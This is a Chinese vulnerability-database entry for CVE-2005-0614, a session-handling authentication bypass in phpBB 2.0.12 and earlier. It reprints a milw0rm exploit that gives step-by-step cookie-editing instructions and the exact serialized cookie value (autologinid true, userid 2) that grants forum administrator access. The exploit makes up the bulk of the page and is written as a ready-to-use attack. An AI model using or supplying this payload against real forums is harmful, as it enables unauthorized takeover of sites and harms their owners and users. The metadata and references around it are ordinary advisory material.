phpBB多个漏洞-安全小百科

phpBB多个漏洞

漏洞ID	1108522	漏洞类型	未知
发布时间	2005-03-11	更新时间	2005-05-02
CVE编号	CVE-2005-0614	CNNVD-ID	CNNVD-200505-776
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/871
https://www.securityfocus.com/bid/90228
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-776

|漏洞详情

phpBB2.0.12及更早版本中的sessions.php使得远程攻击者可以通过一个在cookie中的autologinid值来获取管理员权限。

|漏洞EXP

phpBB 2.0.12 Session Handling Authentication Bypass ..
 
easy to use exploit ..
 
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
 
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
 
3- Close the Browser ..
 
2- Open the cookies.txt ..((located on "C:Documents and SettingsALIApplication DataMozillaFirefoxProfilesur4nn6o5.default" when using WinXP)) in example ;)
 
and you will find something like :
---------------------------------------------------------------------------------------------------------------\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
 
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
 
save the cookies.txt..
 
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! :D
 
complete the mission by clicking " Go to Administration Panel "
 
--------------------------------------------------------------------------------
 
written by : Ali7
e-mail : [email protected]

# milw0rm.com [2005-03-11]

|受影响的产品

phpBB Group phpBB 2.0.12

phpBB Group phpBB 2.0.11

phpBB Group phpBB 2.0.10

phpBB Group phpBB 2.0.9

phpBB Group phpBB 2.0.8 a

phpBB Group phpBB 2.0.8

phpBB

|参考资料

来源:www.phpbb.com
链接:http://www.phpbb.com/phpBB/viewtopic.php?t=267563
来源:SECUNIA
名称:14413
链接:http://secunia.com/advisories/14413
来源:BUGTRAQ
名称:20050304phpBB2.0.12SessionHandlingAdministratorAuthenticationBypass
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110999268130739&w;=2
来源:BUGTRAQ
名称:20050301phpBB<=2.0.12UIDExploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110970201920206&w;=2

相关推荐: MS IE HTML Help Shortcut Vulnerability

MS IE HTML Help Shortcut Vulnerability 漏洞ID 1104318 漏洞类型 Origin Validation Error 发布时间 2000-03-01 更新时间 2000-03-01 CVE编号 N/A CNNVD-I…

文章版权归作者所有，未经允许请勿转载。

THE END